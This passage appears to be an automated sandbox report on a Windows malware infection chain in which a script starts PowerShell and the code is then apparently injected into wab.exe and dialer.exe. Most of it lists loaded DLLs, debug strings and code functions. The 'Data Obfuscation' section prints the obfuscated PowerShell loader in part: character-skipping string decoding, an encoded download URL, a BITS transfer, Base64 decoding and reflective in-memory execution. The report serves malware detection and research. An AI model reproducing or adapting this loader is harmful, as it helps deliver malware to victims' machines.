                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
                    Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: tapi32.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: powrprof.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: umpdc.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mswsock.dll
                    Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2544913073.0000000007047000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdb source: wab.exe, 00000007.00000003.2574386821.00000000255F0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2550855628.0000000007F27000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: wab.exe, 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: wab.exe, 00000007.00000003.2572739867.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000007.00000003.2573715561.0000000025670000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2573394658.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdbUGP source: wab.exe, 00000007.00000003.2572739867.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2536849712.000000000081E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: wab.exe, 00000007.00000003.2573715561.0000000025670000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2573394658.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: wab.exe, 00000007.00000003.2574386821.00000000255F0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: wab.exe, 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2536849712.000000000081E000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){$bekraefte+=$Udr", "0")
                    Source: Yara match | File source: 00000005.00000002.2552866056.000000000A363000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000003.2576092102.00000000055F3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2552391162.0000000008590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2541535117.0000000005841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.2827287313.000002316EE70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Gazenpartn17)$global:bekraefte2 = [System.Text.Encoding]::ASCII.GetString($Opdatering)$global:bekraefte3=$bekraefte2.substring(272260,23729)<#Amfor Overa Antaean Inconsta rationalis
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Orihyper22301 $Chassazers $Knusen4), (Orihyper22300 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Orihyper22308 = ([AppDomain]::CurrentDomain.GetAssembli
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Anthotropi8)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Anthotropi9, $false).DefineType($Knusen0, $Kn
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Gazenpartn17)$global:bekraefte2 = [System.Text.Encoding]::ASCII.GetString($Opdatering)$global:bekraefte3=$bekraefte2.substring(272260,23729)<#Amfor Overa Antaean Inconsta rationalis
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 
'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong 
(Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FF848E8D7B2 push edi; retf 1_2_00007FF848E8D7F6
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_02DA0EF8 push eax; ret 5_2_02DA0F02
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_02DA0EE8 push eax; ret 5_2_02DA0EF2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_02DA0EA8 push eax; ret 5_2_02DA0EE2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_02DA0F08 push eax; ret 5_2_02DA0F12
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_02DA369C push ebx; iretd 5_2_02DA36DA
                    Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 7_2_088D04B4 pushad ; iretd 7_2_088D04B5
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_3_032B4305 push F693B671h; retf 9_3_032B430A
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_3_032B3B74 pushad ; retf 9_3_032B3B83
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_3_032B21AF pushad ; ret 9_3_032B21B7
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_3_032B21EF push ecx; iretd 9_3_032B21FB
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_3_032B45FC push esi; ret 9_3_032B4600
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_3_032B4FC8 push es; ret 9_3_032B4FC9
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_3_032B0FCE push eax; retf 9_3_032B0FCF
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_3_032B3E4E push edi; iretd 9_3_032B3E55
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_3_032B5CD2 push dword ptr [edx+ebp+3Bh]; retf 9_3_032B5CDF
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_059698F0 push eax; ret 9_2_0596991E

                    Persistence and Installation Behavior

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: \KnownDlls\BitsProxy.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
